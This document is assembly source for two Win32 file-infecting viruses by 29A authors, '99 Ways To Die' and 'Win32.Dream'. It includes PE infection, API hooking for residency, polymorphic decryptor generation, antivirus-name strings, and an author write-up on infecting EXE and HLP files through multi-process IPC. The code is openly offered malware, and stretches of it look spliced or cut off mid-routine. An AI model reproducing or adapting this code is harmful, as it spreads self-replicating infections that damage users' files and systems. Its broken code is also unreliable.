@debug macro title,reg
pushad
push 1000h
@@tit: @strz title
pop eax
add eax,ebp
push eax
push reg
push 0h
mov eax,0bff5412eh
call eax
popad
endm
.DATA
; dummy data
db 'WARNING - This is a virus carrier - WARNING'
.CODE
inicio: ; now I've realized I ever
; put this label in Spanish!
pushad
call getDelta
;
; 99Ways begins here!
;
vBegin label byte
call crypt ; decrypt
cli
call $ ; this will fake the proc
skipFakeProcess:
mov esi,dword ptr [kernel32+ebp] ; test last used
call GetKernel32
jnc getAPIsNow
getAPIsNow:
; now get APIs using CRC32
mov edi,0bff70000h ; coded using win9x
kernel32 equ $-4
; ^ this is a nice way to optimize code and hide data,
; almost all the non-temporary data can be placed inside code!
mov esi,edi
mov esi,dword ptr [esi+3ch]
add esi,edi
mov esi,dword ptr [esi+78h]
add esi,edi
add esi,1ch
lodsd
add eax,edi
mov dword ptr [address+ebp],eax
lodsd
add eax,edi
mov dword ptr [names+ebp],eax
lodsd
add eax,edi
mov dword ptr [ordinals+ebp],eax
sub esi,16
lodsd
mov dword ptr [nexports+ebp],eax
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea eax,FSTAPI+ebp
searchl:
mov esi,dword ptr [names+ebp]
add esi,edx
mov esi,dword ptr [esi]
add esi,edi
push eax edx edi
xor edi,edi
movzx di,byte ptr [eax+4]
call CRC32
xchg ebx,eax
pop edi edx eax
cmp ebx,dword ptr [eax]
je fFound
add edx,4
inc dword ptr [expcount+ebp]
push edx
mov edx,dword ptr [expcount+ebp]
cmp dword ptr [nexports+ebp],edx
pop edx
je returnHost
jmp searchl
fFound:
shr edx,1
add edx,dword ptr [ordinals+ebp]
xor ebx,ebx
mov bx,word ptr [edx]
shl ebx,2
add ebx,dword ptr [address+ebp]
mov ecx,dword ptr [ebx]
add ecx,edi
lea edi,vBegin+ebp
sub edi,dword ptr [virusEP+ebp]
add dword ptr [imageBase+ebp],edi ; fix relocations
; in the hook routine
lea esi,vBegin+ebp
mov edi,eax
mov ecx,vSize
rep movsb
; jmp into memory copy - put into edi the return address
; for the memory copy
lea edi,vBegin+ebp
add eax,offset memCopy-offset vBegin
push eax
ret
memCopy:
; get delta offset another time for memory copy
call getDelta
; setup the ret to jmp patched virus copy
mov dword ptr [retPatch+ebp],edi
lea edx,dateTime+ebp
push edx
call dword ptr [_GetSystemTime+ebp]
lea edx,dateTime+ebp
mov ax,word ptr [edx+2]
mov bx,-1
countdown equ $-2
; another time
cmp bx,ax ; the day arrived?
jne skipPay
skipPay:
; alloc a temporary buffer to generate the poly sample
; of the virus ready to infect
push 00000004h
push 00001000h OR 00002000h
push (vSize+1000h)
push 0h
call dword ptr [_VirtualAlloc+ebp]
or eax,eax
jz quitFromMem
returnHost:
; patch virus
call patchVirusBody
quitFromMem:
popad
push 1234568h
retPatch equ $-4
ret
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
clc
ret
GetKernel32Exception:
xor edi,edi
mov eax,dword ptr fs:[edi]
mov esp,dword ptr [eax]
GetKernel32NotFound:
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
stc
ret
;
; This routine makes CRC32.
;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
;
; This routine hooks the APIs that give the virus residency.
; Takes care of relocations.
;
hookApi:
pushad
; init the sem to free
mov byte ptr [semHook+ebp],0
mov edx,400000h
imageBase equ $-4
; ;)
cmp word ptr [edx],'ZM'
jne noHook
mov edi,edx
add edi,dword ptr [edx+3ch]
cmp word ptr [edi],'EP'
jne noHook
mov edi,dword ptr [edi+80h] ; RVA import
or edi,edi
jz noHook
add edi,edx
searchK32Imp:
mov esi,dword ptr [edi+0ch] ; get name
or esi,esi
jz noHook
add esi,edx
push edi ; save (stringUp doesn't)
call stringUp
pop edi
jc nextName
lea esi,stringBuffer+ebp
cmp dword ptr [esi],'NREK' ; look for Kernel32 module
jne nextName
cmp dword ptr [esi+4],'23LE'
je k32ImpFound
nextName:
add edi,14h
mov esi,dword ptr [edi]
or esi,esi
jz noHook
jmp searchK32Imp
k32ImpFound:
mov esi,dword ptr [edi+10h] ; get address table
or esi,esi
jz noHook
add esi,edx
lea ecx,HOOKTABLEEND+ebp
nextImp: ; search for APIs
lea edx,HOOKTABLEBEGIN+ebp
lodsd
or eax,eax
jz noHook
checkNextAPI:
mov edi,dword ptr [edx]
cmp eax,dword ptr [edi+ebp]
je doHook
add edx,8
cmp edx,ecx
jne checkNextAPI
jmp nextImp
doHook:
mov eax,dword ptr [edx+4]
add eax,ebp
mov dword ptr [esi-4],eax
add edx,8
cmp edx,ecx
jne nextImp
noHook:
popad
ret
;
; Converts the string at esi to upper case, storing it in stringBuffer.
; Sets the carry flag if our string buffer is too small. Returns in edi the
; end of the string in the buffer.
;
stringUp:
push esi eax
lea edi,stringBuffer+ebp
mov eax,edi
add eax,STRINGTOP
stringUpLoop:
cmp eax,edi
jne continueStringUp
stc
jmp stringUpOut
continueStringUp:
movsb
cmp byte ptr [esi-1],'a'
jb skipThisChar
cmp byte ptr [esi-1],'z'
ja skipThisChar
add byte ptr [edi-1],'A'-'a'
skipThisChar:
cmp byte ptr [esi-1],0
jne stringUpLoop
dec edi
clc
stringUpOut:
pop eax esi
ret
;
; The hooks.
;
Hook0:
@hook _CreateFileA
Hook1:
@hook _MoveFileA
Hook2:
@hook _CopyFileA
Hook3:
@hook _CreateProcessA
Hook4:
@hook _SetFileAttributesA
Hook5:
@hook _GetFileAttributesA
Hook6:
@hook _SearchPathA
Hook7:
@hook _SetCurrentDirectoryA
;
; This is the general hook that provides per-process residency.
;
generalHook:
push eax
pushad
pushfd
cld
; check if filename==NULL
mov esi,dword ptr [esp+2ch]
or esi,esi
jz leaveHook
; check semaphore
cmp byte ptr [semHook+ebp],0
jne leaveHook
skipPayloadEffect:
call stringUp
jc hookInfectionFail
infectThisFile:
lea esi,stringBuffer+ebp ; erm... here could touch
call infect ; any av!
hookInfectionFail:
mov byte ptr [semHook+ebp],0
leaveHook:
popfd
popad
ret
;
; Infects PE files in current directory. It affects EXE, SCR, CPL and DLL
; extensions.
;
infectDir:
pushad
lea esi,find_data+ebp
push esi
lea esi,fndMask+ebp
push esi
call dword ptr [_FindFirstFileA+ebp]
inc eax
jz notFound
dec eax
findNext:
lea esi,find_data.cFileName+ebp
call stringUp
lea esi,stringBuffer+ebp
push edi ; test that the string is
sub edi,esi ; long enough
cmp edi,5
pop edi
jna skipThisFile
cmp dword ptr [edi-4],'EXE.'
je validFileExt
cmp dword ptr [edi-4],'LLD.'
je validFileExt
cmp dword ptr [edi-4],'LPC.'
je validFileExt
cmp dword ptr [edi-4],'RCS.'
jne skipThisFile
validFileExt:
mov eax,dword ptr [find_data.nFileSizeLow+ebp]
cmp eax,8000h
jb skipThisFile ; at least 8000h bytes?
mov ecx,PADDING ; test if it's infected
xor edx,edx ; yet
div ecx
or edx,edx ; remainder is zero?
jz skipThisFile
lea esi,stringBuffer+ebp
call infect
skipThisFile:
lea esi,find_data+ebp
push esi
push dword ptr [findHnd+ebp]
call dword ptr [_FindNextFileA+ebp] ; Find next file
or eax,eax
jnz findNext
infectionDone:
push dword ptr [findHnd+ebp]
call dword ptr [_FindClose+ebp]
notFound:
popad
ret
;
; Infects PE file increasing last section.
;
; ESI: addr of file name of PE to infect.
;
infect:
pushad
mov dword ptr [fNameAddr+ebp],esi
push esi
push esi
call dword ptr [_GetFileAttributesA+ebp]
pop esi
inc eax
jz infectionError
dec eax
push esi
push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz infectionError
xor eax,eax
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [_CreateFileA+ebp]
inc eax
jz infectionErrorAttrib
dec eax
push 0h
push eax
call dword ptr [_GetFileSize+ebp]
inc eax
jz infectionErrorClose
dec eax
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_GetFileTime+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
mov edi,eax
cmp word ptr [edi],'ZM'
jne infectionErrorCloseUnmap
mov edx,edi
impSectionFound:
or dword ptr [esi+24h],80000000h ; make writable
xor eax,eax
push eax
push dword ptr [pad+ebp]
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push dword ptr [pad+ebp]
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
infectionErrorCloseUnmap:
push dword ptr [mapMem+ebp]
call dword ptr [_UnmapViewOfFile+ebp]
infectionErrorCloseMap:
push dword ptr [fhmap+ebp]
call dword ptr [_CloseHandle+ebp]
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_SetFileTime+ebp]
infectionErrorClose:
push dword ptr [fHnd+ebp]
call dword ptr [_CloseHandle+ebp]
infectionErrorAttrib:
push dword ptr [fileAttrib+ebp]
push dword ptr [fNameAddr+ebp]
call dword ptr [_SetFileAttributesA+ebp]
infectionError:
popad
ret
;
; Here the virus marks the file as not valid. This avoids re-checking the
; file in later executions of the virus. Notice the infected files are not
; marked; for this I use size padding and test the last section properties
; in second instance. Avers will find this mark in files that the virus
; doesn't want ;)
;
notValidFile:
mov edi,dword ptr [mapMem+ebp]
mov word ptr [edi+12h],'(:' ; checked but not valid!
jmp infectionErrorCloseUnmap
;
; This is my 'search EPO' routine. It searches for a call in the code section
; that points to:
;
; push ebp
; mov ebp,esp
;
; This is the way high level languages get the arguments of a procedure
; call. If this code is found I assume the call found is correct and I
; patch it to jump into the virus.
;
searchEPO:
pushad
mov edi,dword ptr [esi+28h] ; get host EP
xor ecx,ecx
mov cx,word ptr [esi+06h] ; number of sections
mov esi,dword ptr [fstSec+ebp] ; get 1st section addr
sectionFound:
test dword ptr [esi+24h],10000000h ; avoid this kind of section
jnz searchEPOFail ; we can corrupt it!
push esi
sub edi,dword ptr [esi+0ch] ; get raw address
add edi,dword ptr [esi+14h]
mov ecx,dword ptr [esi+10h]
cmp ecx,edi
jna searchEPOFail
sub ecx,edi
add edi,dword ptr [mapMem+ebp]
mov ebx,edi
add ebx,ecx
sub ebx,10h ; high secure fence
callLoop: ; loop that searches
cmp byte ptr [edi],0e8h ; for the call
jne continueCallLoop
mov edx,edi
add edx,dword ptr [edi+1]
add edx,5
cmp ebx,edx
jb continueCallLoop
cmp edx,dword ptr [mapMem+ebp]
jb continueCallLoop
mov esi,edx
mov dx,word ptr [esi]
cmp dx,08b55h
jne continueCallLoop
mov dx,word ptr [esi+1]
cmp dx,0ec8bh
jne continueCallLoop
mov dword ptr [EPOAddr+ebp],edi
sub edi,dword ptr [mapMem+ebp]
pop esi
add edi,dword ptr [esi+0ch] ; get rva address
sub edi,dword ptr [esi+14h]
mov dword ptr [EPORva+ebp],edi
clc
jmp searchEPOOut
continueCallLoop:
inc edi
loop callLoop
searchEPOFail:
pop esi
stc
searchEPOOut:
popad
ret
;
; Updates the virus sample ready to infect in our memory buffer.
;
updateVSample:
lea edx,dateTime+ebp
push edx
call dword ptr [_GetSystemTime+ebp]
add eax,12
storeCountdown:
mov word ptr [countdown+ebp],ax
xor eax,eax
push edi
mov cl,_EBP
call AddPushREG
mov ax,0ec8bh
stosw
call GetReg
mov byte ptr [KeyReg+ebp],al
mov cl,al
call AddPushREG
call GetReg
mov byte ptr [LoopReg+ebp],al
mov cl,al
call AddPushREG
mov cl,byte ptr [KeyReg+ebp]
mov edx,dword ptr [CrptKey+ebp]
call AddMovREGINM
mov edx,04h
mov cl,_EBP
call AddMovREGMEMEBP
push edi
noSADD:
test byte ptr [CrptFlags+ebp],F_SSUB
jz noSSUB
noSSUB:
mov cl,_EBP
mov edx,04h
call AddAddREGINM
pop ebx
mov eax,edi
sub eax,ebx
push eax
mov al,75h
stosb
pop eax
mov ah,0feh
xchg al,ah
sub al,ah
stosb
mov cl,_EBP
call AddPopREG
mov al,0c3h
stosb
pop esi
sub edi,esi
mov eax,edi
ret
;
; Poly engine data
;
_EAX equ 0
_ECX equ 1
_EDX equ 2
_EBX equ 3
_ESP equ 4
_EBP equ 5
_ESI equ 6
_EDI equ 7
F_SADD equ 1 or 4
F_SSUB equ 2 or 4
RegStatus db 8 dup(0)
CrptFlags db 0
KeyReg db 0
LoopReg db 0
CrptKey dd 0
CodeSize dd 0
;
; returns AL: selected register
;
GetReg:
xor eax,eax
mov al,byte ptr [CrptKey+ebp]
GetReg1:
and al,7
lea ecx,RegStatus+ebp
add ecx,eax
mov dl,byte ptr [ecx]
or dl,dl
jz GetReg0
inc al
jmp GetReg1
GetReg0:
mov byte ptr [ecx],1
ret
;
; AL: selected register to free
;
FreeReg:
and eax,7
lea ecx,RegStatus+ebp
add ecx,eax
mov byte ptr [ecx],0
ret
;
; Instruction generators
;
; EDI: Destination code
; ECX: Reg (if applicable)
; EDX: Inm (if applicable)
;
AddPushREG:
mov al,050h
add al,cl
stosb
ret
AddPopREG:
mov al,058h
add al,cl
stosb
ret
AddMovREGINM:
mov al,0b8h
add al,cl
stosb
mov eax,edx
stosd
ret
AddMovREGMEMEBP:
mov al,08bh
stosb
mov al,08h
mul cl
add al,85h
stosb
mov eax,edx
stosd
ret
AddXorMEMEBPREG:
mov al,031h
stosb
mov al,08h
mul cl
add al,45h
stosb
xor al,al
stosb
ret
AddAddREGINM:
or cl,cl
jnz AddAddREGINM0
mov al,05h
stosb
jmp AddAddREGINM1
AddAddREGINM0:
mov al,081h
stosb
mov al,0c0h
add al,cl
stosb
AddAddREGINM1:
mov eax,edx
stosd
ret
AddSubREGINM:
or cl,cl
jnz AddSubREGINM0
mov al,2dh
stosb
jmp AddSubREGINM1
AddSubREGINM0:
mov al,081h
stosb
mov al,0e8h
add al,cl
stosb
AddSubREGINM1:
mov eax,edx
stosd
ret
;
; This is our func that does the partial checksum of the file. I know it
; must be improved... but I'm so lazy :( (still lazy)
;
; in: ecx (fileSize+1) shr 2
; esi offset mappedFile
;
; out: eax partial checksum of file
;
CheckSumMappedFile:
push esi
xor eax, eax
shl ecx, 1
je func0_saltito0
test esi, 00000002h
je func0_saltito1
sub edx, edx
mov dx, word ptr [esi]
add eax, edx
adc eax, 00000000h
add esi, 00000002h
sub ecx, 00000002h
func0_saltito1:
mov edx, ecx
and edx, 00000007h
sub ecx, edx
je func0_saltito2
test ecx, 00000008h
je func0_saltito3
add eax, dword ptr [esi]
adc eax, dword ptr [esi+04h]
adc eax, 00000000h
add esi, 00000008h
sub ecx, 00000008h
je func0_saltito2
func0_saltito3:
test ecx, 00000010h
je func0_saltito4
add eax, dword ptr [esi]
adc eax, dword ptr [esi+04h]
adc eax, dword ptr [esi+08h]
adc eax, dword ptr [esi+0Ch]
adc eax, 00000000h
add esi, 00000010h
sub ecx, 00000010h
je func0_saltito2
func0_saltito4:
test ecx, 00000020h
je func0_saltito5
add eax, dword ptr [esi]
func0_saltito5:
test ecx, 00000040h
je func0_saltito6
add eax, dword ptr [esi]
func0_saltito6:
add eax, dword ptr [esi]
func0_saltito2:
test edx, edx
je func0_saltito0
func0_saltito7:
sub ecx, ecx
mov cx, word ptr [esi]
add eax, ecx
adc eax, 00000000h
add esi, 00000002h
sub edx, 00000002h
jne func0_saltito7
func0_saltito0:
mov edx, eax
shr edx, 10h
and eax, 0000FFFFh
add eax, edx
mov edx, eax
shr edx, 10h
add eax, edx
and eax, 0000FFFFh
pop esi
ret
;
; Virus data ---------------------------------------------------------------
;
HOOKTABLEBEGIN label byte
dd offset _CreateFileA
dd offset Hook0
dd offset _MoveFileA
dd offset Hook1
dd offset _CopyFileA
dd offset Hook2
dd offset _CreateProcessA
dd offset Hook3
dd offset _SetFileAttributesA
dd offset Hook4
dd offset _GetFileAttributesA
dd offset Hook5
dd offset _SearchPathA
dd offset Hook6
dd offset _SetCurrentDirectoryA
dd offset Hook7
HOOKTABLEEND label byte
CrcMapViewOfFile dd 0797b49ech
db 14
_MapViewOfFile dd 0
CrcCreatFileMappingA dd 096b2d96ch
db 19
_CreateFileMappingA dd 0
CrcUnmapViewOfFile dd 094524b42h
db 16
_UnmapViewOfFile dd 0
CrcCloseHandle dd 068624a9dh
db 12
_CloseHandle dd 0
CrcFindFirstFileA dd 0ae17ebefh
db 15
_FindFirstFileA dd 0
CrcFindNextFileA dd 0aa700106h
db 14
_FindNextFileA dd 0
CrcFindClose dd 0c200be21h
db 10
_FindClose dd 0
CrcVirtualAlloc dd 04402890eh
db 13
_VirtualAlloc dd 0
CrcGetTickCount dd 0613fd7bah
db 13
_GetTickCount dd 0
CrcGetFileTime dd 04434e8feh
db 12
_GetFileTime dd 0
CrcSetFileTime dd 04b2a3e7dh
db 12
_SetFileTime dd 0
CrcSetFileAttributesA dd 03c19e536h
db 19
_SetFileAttributesA dd 0
CrcGetFileAttributesA dd 0c633d3deh
db 19
_GetFileAttributesA dd 0
CrcGetFileSize dd 0ef7d811bh
db 12
_GetFileSize dd 0
CrcGetSystemTime dd 075b7ebe8h
db 14
_GetSystemTime dd 0
CrcMoveFileA dd 02308923fh
db 10
_MoveFileA dd 0
CrcCopyFileA dd 05bd05db1h
db 10
_CopyFileA dd 0
CrcCreateProcessA dd 0267e0b05h
db 15
_CreateProcessA dd 0
CrcSearchPathA dd 0f4d9d033h
db 12
_SearchPathA dd 0
CrcGetCurrentDirectoryA dd 0ebc6c18bh
db 21
_GetCurrentDirectoryA dd 0
CrcSetCurrentDirectoryA dd 0b2dbd7dch
db 21
_SetCurrentDirectoryA dd 0
CrcGetWindowsDirectoryA dd 0fe248274h
db 21
_GetWindowsDirectoryA dd 0
ENDAPI label byte
; AV: AVP, PAV, NAV, ...
; AN: SCAN, VISUSSCAN, ...
; DR: DRWEB
; ID: SPIDER
; OD: NOD-ICE
; TB: THUNDERBYTE... (this still exists?)
; F-: F-PROT, ...
avStrings dw 'VA','NA','RD','DI','DO','BT','-F'
vStringsCout equ (offset $-offset avStrings)/2
fndMask db '*.*',0
fHnd dd 0
fhmap dd 0
mapMem dd 0
infCount db 0
fileSize dd 0
fileAttrib dd 0
fileTime0 dd 0,0
fileTime1 dd 0,0
fileTime2 dd 0,0
pad dd 0
fNameAddr dd 0
gensize dd 0
myRVA dd 0
fstSec dd 0
find_data WIN32_FIND_DATA <0>
findHnd dd 0
semHook db 0
EPORva dd 0
EPOAddr dd 0
dateTime db 16 dup(0)
payload db 0
pchcks dw 0
BUFFEREND label byte
BUFFERSIZE equ BUFFEREND-BUFFERBEGIN
;
; Fake host for 1st generation
;
fakeHost:
push 1000h
title: @strz "(C) 2000 Bumblebee/29a"
mess: @strz "99 Ways To Die activated. Have a nice day."
push 0h
call MessageBoxA
push 0h
call ExitProcess
Ends
End inicio
;
; hi sweet!
;
; ' the preacher said, richer or poorer
; my mama said, thick or thin
; you can kiss me, baby
; when it's time to get thick again '
;
;
;
; ┌──════════──┌────────────────────────────────────────────┐──════════──┐
; : Prizzy/29A:                Win32.Dream                 : Prizzy/29A :
; └──════════──└────────────────────────────────────────────┘──════════──┘
;
; Hello people, here is my third virus, and this one is designed for the
; whole Win32 platform. It infects only EXE (PE - Portable Executable)
; files and also HLP (Windows Help File Format) files.
;
; When an infected EXE file is started, EIP goes through my simple poly-
; morphic engine, which isn't so important in this virus; then the virus
; hooks the CreateFileA function, installs itself into memory and only
; then passes EIP to the host - there are two returns, one for EXE and
; the other for HLP files.
;
; With might and mind I wanted to use only the best of the new high-tech
; vx methods we know, and I think there is nothing worse than a virus
; equipped with interprocess communication (IPC). I also changed my coding
; style and this source is as optimized as I could make it.
;
;
; Detailed Information
; ──────────────────────
;
;
; 1. Interprocess Communication (IPC)
; ───────────────────────────────────
; You may have seen one IPC virus (Vulcano) by Benny/29A, but I used this
; feature in a different way than he did. His IPC virus lives in only one
; process and can communicate with other viruses in another process.
;
; The parts of my Win32.Dream virus work in several processes and in fact
; it behaves like one whole virus. After installing itself into memory,
; the virus removes itself from the memory of the infected program.
;
;
; 1.1. Creating processes
; ───────────────────────
; This virus is divided into seven 'independent' functions, each of which
; has its own process. To create a new process I build a dropper and run
; it via CreateProcessA.
;
; The dropper then waits until the new function for its process is ready;
; if it is, it shares two mapped blocks (OpenFileMappingA) with that pro-
; cess (the global memory and the function's body) and creates a thread
; on the function. The process can't terminate, it can only Sleep. All
; created processes are hidden in Windows 95, not in WinNT/2k (it's more
; complex there).
;
;
; 1.2. IPC in action
; ──────────────────
; The hooked CreateFileA function receives control, sets the flag for a
; certain process and wakes it up. That process finishes its own task and
; returns the results.
;
;
; 1.3. Global memory
; ──────────────────
; It's necessary to share some important information among all processes.
; It is:
;
; + [thandle]    : When the dropper creates a new thread, the returned
;                  handle is stored here. It indicates the thread's
;                  error code.
; + [th_mempos]  : Here is stored the name of the function's mapped
;                  object. The dropper will open that memory area.
; + [process]    : hProcess and ProcessID values of all the created pro-
;                  cesses, needed for opening/running them.
; + [apiz]       : The addresses of all the APIs I call are in this
;                  place.
; + [active]     : If another process wants to run me, it sets a certain
;                  flag here and the thread tests it.
; + [paramz]     : This is the place where the virus stores some para-
;                  meters passed among processes (see below).
; + [vbody]      : Here is the copy of the virus, useful for changing
;                  values inside and for the poly engine.
; + [filename]   : The name of the file to be infected next. The new
;                  CreateFileA function stores the name here.
; + [cinfected]  : Two FPU memory buffers, one for creating the infec-
;                  tion mark, the other for checking it.
; + [poly_vbody] : Output of the polymorphic engine.
;
;
; 1.4. Parameters
; ───────────────
; As I wrote above, I have to get some parameters of the input processes.
; Here is the description of them:
;
; + [1st param] : Output of the polymorphic engine, the new size of the
;                 virus.
; + [2nd param] : File size for checksum (plus the poly size).
; + [3rd param] : The name of the mapped file (for OpenFileMappingA).
; + [4th param] : a. File size for check_infected (without the poly size).
;                 b. Output of checksum.
; + [5th param] : Input for check_infected; if '1', then it wants to
;                 get an angle for create_infected.
; + [6th param] : Terminate all processes? (WinNT/2000 only)
; + [7th param] : Terminate all processes? (Win95/98 only)
;                 (because of the Win95/98 kernel bug)
;
;
; 1.5. Termination of all the processes
; ─────────────────────────────────────
; I remember it was a hard nut for me, but of course I had to solve it.
; At first I changed the flags of the process (SetErrorMode, which means
; the process won't show any message box if it executes bad instruc-
; tions), then I had to check whether the host is still alive. In
; Win95/98 I discovered a kernel bug, so I couldn't use the WinNT method
; (OpenProcess) to check whether the host still exists, because Win95/98
; don't delete its process id handle.
; Win95 - you can only read some value from the memory allocated by the
;         host.
; WinNT - that allocated memory is opened by another process, so you
;         can't identify whether the host still exists.
;
;
; 1.6. The scheme of all the processes
; ────────────────────────────────────
;
;   new CreateFileA API function
;     |
;     +--> infect file
;            |
;            +--> infect HLP
;            |
;            +--> infect EXE
;                   |
;                   +--> [check_infected]
;                   +--> [poly_engine]
;                   +--> [create_infected]
;                   +--> [checksum]
;
;
; 2. Optimization and comments
; ────────────────────────────
; Sometimes I heard that my last virus Win32.Crypto was too huge, and some
; people also made fun of me (benny, mort - gotcha bastards!), saying that
; my next virus would be bigger than one megabyte. I wanted to optimize
; the next one and I didn't tell them, so I think it'll be a surprise for
; them that I proved them wrong. Nevertheless I've had a taste of the
; other side and now I can return without any major problems. But now I
; can say the virus is more optimized than benny's bits and pieces. The
; source code is not commented enough because I think not many people
; will try something like IPC. If they do, they can contact me.
;
;
; 3. Check infected routine
; ─────────────────────────
; Long ago in Win32.Crypto I tried to use a unique math technique to
; check whether the file is infected. Now I have thought up a new, more
; complex way. At first, from the infected file I'll build the equation,
; for example:
;     y = 32*x^7 + 192*x^3 - 8212*x^5 - 72*x
; and I'll take two points on that curve, for example x1=4 and x2=7. Then
; I will calculate what angle is between the tangents to the curve at
; those two points, which means: I have to calculate the derivative y' of
; that equation, and if I know y' at x1 and at x2 then I will determine:
;     & = arc tg | log(x1 - x2) - log(1 + x1*x2) |
; If the angle is greater than e.g. 75 degrees, the file is infected.
;
; This algorithm has been coded only for fun, so I know we've got easier
; methods but I couldn't recall any.
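; Added worked example (not part of the original write-up): the angle
; between the two tangents as the FPU code in check_infected actually
; evaluates it (fsub, fmul, fld1, fadd, fdiv, fabs, fpatan, then *180/pi),
; applied to the sample polynomial and sample points above. m1 and m2 are
; names assumed here for the two tangent slopes.
;
;   $$ y = f(x) = 32x^7 - 8212x^5 + 192x^3 - 72x $$
;   $$ f'(x) = 224x^6 - 41060x^4 + 576x^2 - 72 $$
;   $$ m_1 = f'(4) = 917504 - 10511360 + 9216 - 72 = -9584712 $$
;   $$ m_2 = f'(7) = 26353376 - 98585060 + 28224 - 72 = -72203532 $$
;   $$ \tan\theta = \left|\frac{m_1 - m_2}{1 + m_1 m_2}\right|
;        = \frac{62618820}{1 + 6.9205\times10^{14}} \approx 9.05\times10^{-8} $$
;   $$ \theta \approx 9.05\times10^{-8}\ \text{rad}
;        \approx 5.2\times10^{-6}\ \text{degrees} $$
;
; With these sample values both slopes are huge and negative, so the two
; tangents are nearly parallel and theta is practically zero, far below a
; 75 degree threshold; theta only approaches 90 degrees when m1*m2 is
; close to -1, i.e. when the two tangents are nearly perpendicular.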
;
;
; 4. Pearls behind the scene
; ──────────────────────────
; * Only two weeks before release I finally thought up the virus name.
; * At one point during coding I stopped writing and didn't code this
;   virus for two months. Later when I started again I couldn't remember
;   what that code does and so on.
; * At present there exist more than fifty backup copies.
; * The worst part of the virus was the dropper; there were many changes
;   because of Win9x and WinNT compatibility, and many bugs were there.
; * After an hour of coding I accidentally deleted the new version, so I
;   had to save more than one gigabyte from FAT32 onto another hard disk.
;   Only there did I find that lost version.
; * The thing I like best in the whole virus is the main comment.
; * The working directory was 'E:\X_WIN\' and this file's name was
;   'WIN.AS!'.
; * Last week I was looking for help on mirc:
;   <prizzy> i used also OpenFileMapping, but I think yes; if ...
;   <Bumblebee> mmm
;   <Bumblebee> OpenFileMapping?
;   <prizzy> yes :)
;   <Bumblebee> i've never used it [bumble~1.log, 18:59:17]
;   ...but I didn't find much help there (although Bumblebee helped me
;   with another bug).
; * During the whole coding I read five books and three film scripts.
;
;
; 5. List of greetings
; ────────────────────
; Darkman The master of the good optimistic mood
; Bumblebee Thanks for your help during coding
; Billy Belcebu So, our communication has started yet
; GriYo All the time busy man
; Lord Julus Waiting for your new virus and its meta engine
; Mort So did you think this source will be bigger then
; one megabytes? Sorry, maybe later :).
; J.P. I look forward on future with you, dude.
; Ratter No, no. Stop reading and let you show us what you
; are hiding inside.
; VirusBuster Here is that secret bin with savage poly engine as
; you wrote on #virus.
; Benny It the best in the end, benny. Haha, at last this
; source is optimized and you will stop to worry me.
; Thanks for all you have e'er done for me.
; ...and for flush, asmodeus, mlapse, mgl, f0re and evul.
;
;
; 6. Contact me
; ─────────────
; prizzy@coderz.net
; http://prizzy.cjb.net
;
;
; (c)oded by Prizzy/29A, June 2000
;
;
.486p
.model flat,STDCALL
locals
include include\mz.inc
include include\pe.inc
extrn ExitProcess:proc
extrn CreateFileA:proc
extrn MessageBoxA:proc
.data
db ?
.code
vstart proc
pusha
call $+5
pop ebp
sub ebp,$-vstart-1 ;get delta
vsize equ file_end - vstart
mov eax,[esp+vsize+32]
sub eax,1000h
inf_ep equ $-4
mov [ebp+ha_module-vstart],eax
add eax,fg0 - vstart + 1000h
org_ep equ $-4 ;get startup address
push eax
call get_k32_apis
jmp __return
@anti_e:
call kill_st
call check_resident ;try to create it
call create_process_maps
.if byte ptr [ebp+error-vstart] == 0
call hookapi
.endif
__return:
pop dword ptr [esp+28]
popa
sub esp,-vsize-4
db 90h,90h
jmp eax ;exe back
xor eax,eax ;hlp back
ret 8
vstart endp
get_k32_apis proc
push 20
mov eax,[esp+vsize+48] ;find k32 address
sub ax,ax
pop ecx
@@1:.if word ptr [eax] != 'ZM'
sub eax,65536
loop @@1
jmp gk32a_f_a
.endif
cmp byte ptr [ebp+__return+11-vstart],90h
jz $+5
pop eax
jmp __return
push eax eax ;get k32 tables
add eax,[eax+60]
pop ebx edi
add ebx,[eax+78h]
mov cl,0
@@3:push ebx ecx
mov edx,[ebx+32]
add edx,edi
@@4:mov esi,[edx] ;calculate next crc32 func.
add esi,edi
push ecx edx ebx ;crc32 algorithm
stc
sbb ecx,ecx
mov edx,ecx
@@4_crc32_nByte:
sub eax,eax
sub ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
@@4_crc32_nBit:
shr bx,1
rcr ax,1
jnc @@4_crc32_no
xor ax,08320h
xor bx,0edb8h
@@4_crc32_no:
dec dh
jnz @@4_crc32_nBit
xor ecx,eax
xor edx,ebx
cmp byte ptr [esi-1],0
jnz @@4_crc32_nByte
@@4_crc32_fin:
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx ecx
